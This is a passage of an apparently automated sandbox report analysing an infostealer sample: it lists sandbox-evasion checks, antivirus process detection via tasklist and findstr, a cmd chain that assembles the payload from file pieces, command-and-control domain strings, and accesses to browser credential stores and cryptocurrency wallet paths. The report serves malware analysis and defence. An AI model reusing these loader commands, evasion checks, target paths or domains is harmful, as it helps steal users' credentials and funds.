            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008E23FC IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_008E23FC
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0086F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,12_2_0086F64C
            Source: C:\Users\user\Desktop\80441fcf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103895
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CookbookJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifAPI coverage: 4.5 %
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif TID: 5264Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif TID: 2968Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0040325A FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_0040325A
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00402B9F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,0_2_00402B9F
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00402CB4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402CB4
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BE1AC GetFileAttributesW,FindFirstFileW,FindClose,12_2_008BE1AC
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_008BD98E
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_008CA29A
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C6406 FindFirstFileW,FindNextFileW,FindClose,12_2_008C6406
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0088C5F3 FindFirstFileExW,12_2_0088C5F3
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_008C70FE
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C705D FindFirstFileW,FindClose,12_2_008C705D
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_008BD65B
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_008C9DB1
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00854E68
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CookbookJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\IncreasinglyJump to behavior
            Source: Apply.pif, 0000000C.00000002.2541325415.0000000003B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: Apply.pif, 0000000C.00000003.2482088449.0000000004B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: Apply.pif, 0000000C.00000003.2482088449.0000000004B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CF229 BlockInput,12_2_008CF229
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041AF8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AF8A
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00854E68
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00875038 mov eax, dword ptr fs:[00000030h]12_2_00875038
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_008B1244
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041B0EF SetUnhandledExceptionFilter,0_2_0041B0EF
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041B2A5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B2A5
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041AF8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AF8A
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008828E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_008828E2
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00870B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00870B8F
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00870D25 SetUnhandledExceptionFilter,12_2_00870D25
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00870F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00870F71

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: associationokeo.shop
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: turkeyunlikelyofw.shop
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pooreveningfuseor.pw
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: edurestunningcrackyow.fun
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: detectordiscusser.shop
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: problemregardybuiwo.fun
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lighterepisodeheighte.fun
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: technologyenterdo.shop
            Source: Apply.pif, 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: assumptionflattyou.shop
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_008B18E3
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00401B98 ShellExecuteExW,WaitForSingleObject,CloseHandle,0_2_00401B98
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0086F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,12_2_0086F64C
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BE996 mouse_event,12_2_008BE996
            Source: C:\Users\user\Desktop\80441fcf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 5758Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pifJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Ink 5758\oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif 5758\Apply.pif 5758\oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_008B1244
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B1D45 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_008B1D45
            Source: Apply.pifBinary or memory string: Shell_TrayWnd
            Source: 80441fcf.exe, 00000000.00000003.2163056937.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Apply.pif, 0000000C.00000000.2190256797.00000000008ED000.00000002.00000001.01000000.00000005.sdmp, Apply.pif, 0000000C.00000003.2426382536.0000000004473000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041AAAF cpuid 0_2_0041AAAF
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,GetEnvironmentVariableW,GetLastError,lstrcmpiW,SetLastError,lstrlenA,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_004030A0
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00402648 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,0_2_00402648
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008AE514 GetUserNameW,12_2_008AE514
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0088BCA2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0088BCA2
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00854E68
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Apply.pif PID: 6488, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Apply.pif, 0000000C.00000002.2541623497.0000000003CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Apply.pif, 0000000C.00000003.2483458637.0000000004A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/ExodusWeb3
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: 80441fcf.exe, 00000000.00000003.2163056937.00000000027A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $airplanespringfieldnice = 'withdrawalarkansascheckinghockeystoredossayingregionchesterappreciationpaymenttaughtdishes'
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\Application Data\Mozilla\FirefoxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
